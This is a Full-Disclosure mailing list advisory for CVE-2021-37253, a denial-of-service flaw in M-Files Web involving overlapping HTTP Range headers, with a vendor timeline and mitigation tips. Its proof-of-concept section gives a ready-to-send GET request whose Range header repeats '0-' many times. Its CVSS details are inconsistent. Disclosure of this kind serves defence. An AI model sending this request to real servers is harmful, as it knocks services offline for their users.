| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 1 Dec 2021 17:08:38 +0300 From: Murat Aydemir <murataydemir94@...il.com> To: fulldisclosure@...lists.org Subject: [FD] CVE-2021-37253: M-Files Web Improper Range Header Processing Denial of Services (DoS) Vulnerability I. SUMMARY ============================================================================================================================================================= Title: M-Files Web Improper Range Header Processing Denial of Services (DoS) Vulnerability Product: M-Files Web version before 20.10.9524.1, M-Files Web version before 20.10.9445.0 Vulnerability Type(s): Denial of Services (DoS) Credit by/Researcher: Murat Aydemir (Turkey) Contact: https://twitter.com/mrtydmr75 Github: https://github.com/murataydemir ============================================================================================================================================================= II. CVE REFERENCE, CVSS SCORES & VULNERABILITY TYPES ============================================================================================================================================================= CVE Number: CVE-2021-37253 CVSSv3 Score: 4.3 CVSSv3 Vector: CVSS:4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L) Severity: Medium Confidentiality Impact: None (There is no impact to the confidentiality of the system) Integrity Impact: None (There is no impact to the integrity of the system) Availability Impact: Complete (There is a total shutdown of the affected resource. The attacker can render the resource completely unavailable) Access Complexity: Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit) Authentication: Not required (Authentication is not required to exploit the vulnerability) Gained Access: None Vulnerability Type(s): Denial of Services (DoS) CWE ID: CWE-399 Resource Management Errors ( https://cwe.mitre.org/data/definitions/399.html) ============================================================================================================================================================= III. TIMELINE ============================================================================================================================================================= Contact to Vendor: the 24th of August, 2020 Vendor (M-Files) Reply: the 3rd of November, 2020 (rejected vulnerability) Contact to Vendor: the 4th of November, 2020 (provide additional informations & some of proof of concepts) Vendor (M-Files) Reply: the 6th of November, 2020 (accepted vulnerability and ask time to fix) Vendor (M-Files) Reply: the 4th of August, 2021 (inform me that "we're accepting this vulnerability but we'll not give an effort to fix that and also will not apply any CVE for this vuln.") Contact to MITRE: the 4th of August, 2021 (contacted MITRE and applied for CVE. MITRE has reserved CVE to me for this vulnerability) ============================================================================================================================================================= IV. DESCRIPTION & MITIGATION ============================================================================================================================================================= M-Files Web version before 20.10.9524.1 and M-Files Web version before 20.10.9445.0 contain an Improper Range Header Processing Vulnerability. A remote unauthenticated attacker may send crafted requests with overlapping ranges (via HTTP requests with a specially-crafted Range or Request-Range headers) to cause the web application to compress each of the requested bytes, resulting in a crash due to excessive memory and CPU consumption and preventing users from accessing the system. Even if this vulnerability (CVE-2021-37253) has been verified and accepted by the Vendor (M-Files), their security team also contacted me and informed me that no effort will be given to fixing this vulnerability. Thus, there is no active patch, update or mitigation plan for CVE-2021-37253 vulnerability. These are not exactly fix the problem (maybe just remediation), however I strongly recommend you to restrict IP addresses for web applications which incoming requests/clients or reconfigure the web server for "Byte-range Request Segment Size" as soon as possible. ============================================================================================================================================================= V. PROOF OF CONCEPT (POC) FOR CVE-2021-37253 ============================================================================================================================================================= This is easy to detect and exploit for this vulnerability. Just find a static content (such as .png, .jpg, .jpeg, .js, .css and so on) and make a request as follows. GET /Icons/Standard/Listing/VaultMounting.png HTTP/1.1 Host: <host> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Connection: close Range: bytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0- Note: this issue is valid and easly reproducable for all static assests (which has .png, .jpg, .jpeg, .js, .css, .gif extensions and so on) ============================================================================================================================================================= VI. REFERENCE(S) ============================================================================================================================================================= https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37253 https://nvd.nist.gov/vuln/detail/CVE-2021-37253 ============================================================================================================================================================= _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists